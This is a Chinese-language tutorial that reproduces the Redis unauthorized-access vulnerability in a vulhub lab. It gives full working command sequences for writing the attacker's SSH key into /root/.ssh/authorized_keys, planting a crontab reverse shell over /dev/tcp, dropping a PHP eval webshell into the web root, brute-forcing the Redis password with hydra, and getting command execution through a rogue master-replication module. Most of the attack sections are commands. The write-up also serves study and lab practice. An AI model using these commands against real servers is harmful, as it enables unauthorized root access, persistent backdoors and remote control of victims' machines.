概述
Redis 默认绑定在 0.0.0.0:6379,在未配置防火墙或访问控制的情况下会将服务暴露在公网上。若未设置访问密码(默认通常为空),攻击者可直接未授权访问 Redis。利用 Redis 提供的 CONFIG 命令,攻击者可修改配置并将数据持久化到指定路径,从而实现向服务器写入任意文件。通过该方式,攻击者可将自己的 SSH 公钥写入 /root/.ssh/authorized_keys 文件中,进而使用对应私钥远程登录目标主机,获取系统权限。
条件
- Redis服务以root用户身份运行,权限较高。
- Redis未设置密码或使用弱密码,允许免密或弱认证访问。
- Redis监听在公网地址(如
0.0.0.0:6379),且未配置防火墙等访问控制,导致任意IP均可连接。
方法
- 使用
INFO命令获取Redis服务器参数和敏感信息,辅助渗透。 - 上传SSH公钥,实现免密码SSH登录。
- 利用
crontab定时任务反弹Shell。 - 在Web目录写入WebShell。
- 利用Redis主从复制机制实现远程代码执行(RCE)。
危害
- 攻击者无需认证即可访问内部数据,导致敏感信息泄露,同时可恶意执行
flushall清空所有数据。 - 攻击者可利用
EVAL命令执行 Lua 代码,或通过数据备份功能向磁盘写入后门程序。 - 最严重的情况是,当 Redis 以 root 身份运行时,攻击者可写入 root 账户的 SSH 公钥,实现免密码远程登录受害服务器。
漏洞复现
环境准备
vulhub起靶场
靶场目录和启动命令下面都有
docker compose up
docker ps
攻击机环境准备
wget http://download.redis.io/releases/redis-2.8.12.tar.gz
tar -xzf redis-2.8.12.tar.gz
cd redis-2.8.12
make
cd src
./redis-cli -h
测试连通性
漏洞探测
端口扫描
nmap -sV --open -p- 192.168.64.10
通常 Redis 服务默认开放在 6379 端口,但我的靶机将其映射到了 52018 端口。但是nmap 仍成功识别出该端口运行的是 Redis 服务。
连接redis
以下命令用于连接远程 Redis 服务器
./redis-cli -h 192.168.64.10 -p 52018
./redis-cli 表示使用当前目录下的 Redis 命令行客户端进行连接,-h 参数用于指定目标主机的 IP 地址(此处为 192.168.64.10),-p 用于指定 Redis 服务监听的端口号(此处为 52018)。
获得SSH登陆权限
可以通过向 Redis 数据库中写入 SSH 公钥的方式,获取目标服务器的 SSH 登录权限。
原理
利用 Redis 未授权访问漏洞,将本机的 SSH 公钥作为一个字符串写入 Redis 中(key 值可以随意),然后通过修改 Redis 的工作目录为 /root/.ssh,并将保存文件名设置为 authorized_keys。这样,当 Redis 执行保存操作时,便会将 SSH 公钥写入到目标服务器的 /root/.ssh/authorized_keys 文件中,从而实现免密登录。
生成key
使用以下命令生成一对 SSH 密钥(默认生成 id_rsa 和 id_rsa.pub)
ssh-keygen -t rsa
执行命令后按回车使用默认路径和空密码即可。生成完成后,公钥文件 id_rsa.pub 将用于写入目标 Redis 服务器,实现后续的免密 SSH 登录。
导入key.txt文件
以下命令将本机生成的公钥包装成一个带换行的文件 key.txt,用于后续写入 Redis
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt
写入靶机
将 key.txt 的内容写入 Redis 缓存
cat key.txt | ./redis-cli -h 192.168.64.10 -p 51622 -x set test
说明:使用 -x 选项可以将标准输入内容作为值写入键 test。(注:由于靶机重启,端口变更为 51622)
设置靶机ssh文件
注意如果这里使用docker起环境就不能写入文件(没有权限),下文有exp地址.
./redis-cli -h 192.168.64.10 -p 51622
# 设置 Redis 的工作目录为目标机器的 /root/.ssh 目录
config set dir /root/.ssh
# 设置保存文件名为 authorized_keys(SSH 公钥默认认证文件)
config set dbfilename authorized_keys
# 查看当前所有 key,确认公钥是否已写入缓存
keys *
get test
# 将缓存中的数据写入到硬盘文件
save
# 之后即可通过 SSH 免密码登录目标主机
ssh root@192.168.64.10
# 登录后可以查看写入的公钥文件内容
cat /root/.ssh/authorized_keys
注意:如果 Redis 运行在 Docker 容器中,通常没有权限写入文件系统,无法完成此操作。后文会提供对应的 Exploit 脚本地址。
漏洞利用
通过 crontab 定时任务反弹
原理与写入公钥类似,只是写入内容和路径不同。通过将反弹shell命令写入 /var/spool/cron/root,实现定时执行反弹shell。
# 本地监听端口(端口可自定义,避免冲突)
nc -lv 6666
# 连接 Redis,写入反弹shell任务
./redis-cli -h 192.168.64.10
set test2 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/客户端IP/4444 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
Web目录写入 WebShell
利用 Redis 写入 Web 目录,生成 WebShell,实现远程代码执行。
./redis-cli -h 192.168.64.10
config set dir /var/www/html
set shell "\n\n\n<?php @eval(\$_POST['wintry']);?>\n\n\n"
config set dbfilename shell.php
save
# 利用hydra爆破redis密码(若设置了密码)
hydra -P passwd.txt redis://192.168.1.111
利用 Redis 主从复制实现远程命令执行 (ECE)
Redis 通过主从复制机制分摊压力,但可被攻击者利用伪装为 Redis 主节点,传输恶意模块,实现命令执行。
攻击思路:
- 伪装成 Redis 服务器,欺骗受害者将其设置为主节点。
- 传输恶意模块(.so 文件)到受害者。
- 受害者加载该模块,实现任意命令执行。
./redis-cli -h 192.168.64.10
MODULE LOAD /root/redis-rogue-server/exp.so
system.exec "whoami"
Redis 常用命令汇总
redis-cli -h ip -p 6379 -a passwd # 连接远程Redis
info # 查看Redis信息
set key value # 设置键值对
get key # 获取键值
incr key # 递增键值
keys * # 查看所有键
config set protected-mode no # 关闭保护模式
config set dir /path/to/dir # 设置保存目录
config set dbfilename filename.rdb # 设置保存文件名
save # 保存快照到磁盘
flushall # 清空所有数据
del key # 删除指定键
slaveof ip port # 设置主从复制关系
mset k1 v1 k2 v2 k3 v3 # 批量设置键值
mget k1 k2 k3 # 批量获取键值
参考文章
- Redis未授权访问 (https://wiki.wgpsec.org/knowledge/web/unauthorized.html#redis)
- redis未授权漏洞复现(超详细)(https://www.cnblogs.com/qingzhang/articles/18195354)
- redis未授权访问漏洞【vulhub靶场】复现(https://blog.csdn.net/m0_55854679/article/details/126100539)
![NSSCTF [NISACTF 2022]ezheap](https://i-blog.csdnimg.cn/img_convert/768ee05305cf8932caa882c4a53fa5c7.png)
